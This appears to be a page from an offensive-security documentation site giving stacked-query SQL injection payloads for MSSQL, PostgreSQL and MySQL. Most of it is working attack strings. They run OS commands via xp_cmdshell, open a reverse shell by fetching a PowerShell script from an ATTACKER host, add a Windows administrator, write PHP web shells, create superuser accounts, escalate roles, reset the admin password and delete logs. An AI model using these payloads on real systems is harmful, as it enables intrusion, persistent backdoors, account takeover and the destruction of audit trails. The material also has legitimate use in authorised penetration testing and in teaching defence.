Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

Execute multiple SQL statements separated by ;. Unlike UNION/error-based, stacked queries can run INSERT, UPDATE, DELETE, and administrative commands. Not all databases/drivers support this.

Support Matrix

DatabaseSupportedNotes
MSSQLYesFull support
PostgreSQLYesFull support
MySQLDependsOnly with mysqli_multi_query() or PDO with ATTR_EMULATE_PREPARES
SQLiteYesVia some drivers
OracleNoNot supported

MSSQL

Execute Commands

'; EXEC xp_cmdshell 'whoami'-- -

Enable xp_cmdshell

'; EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;-- -

Create Admin User

'; EXEC('net user hacker Password123! /add'); EXEC('net localgroup administrators hacker /add')-- -

Reverse Shell

'; EXEC xp_cmdshell 'powershell -c "iex(iwr http://ATTACKER/shell.ps1)"'-- -

PostgreSQL

Command Execution

'; CREATE TABLE cmd(output text); COPY cmd FROM PROGRAM 'id';-- -

Create User

'; CREATE USER hacker WITH PASSWORD 'pass123' SUPERUSER;-- -

File Write

'; COPY (SELECT '<?php system($_GET["cmd"]); ?>') TO '/var/www/html/shell.php';-- -

MySQL

Write File

'; SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';-- -

Create User

'; CREATE USER 'hacker'@'%' IDENTIFIED BY 'pass123'; GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'%';-- -

Data Manipulation

Insert Data

'; INSERT INTO users (username,password,role) VALUES ('hacker','pass123','admin');-- -

Update Data

'; UPDATE users SET role='admin' WHERE username='hacker';-- -
'; UPDATE users SET password='newpass' WHERE username='admin';-- -

Delete Data

'; DELETE FROM logs WHERE 1=1;-- -

Detection

If second query executes, stacked queries work: 
'; SELECT SLEEP(5);-- -             # MySQL
'; WAITFOR DELAY '0:0:5';-- -      # MSSQL
'; SELECT pg_sleep(5);-- -         # PostgreSQL

Quick Reference

DatabasePayload
MSSQL RCE'; EXEC xp_cmdshell 'whoami'-- -
PostgreSQL RCE'; COPY cmd FROM PROGRAM 'id'-- -
MySQL write'; SELECT ... INTO OUTFILE '/path'-- -
Insert user'; INSERT INTO users VALUES(...)-- -
Update role'; UPDATE users SET role='admin'-- -

Sources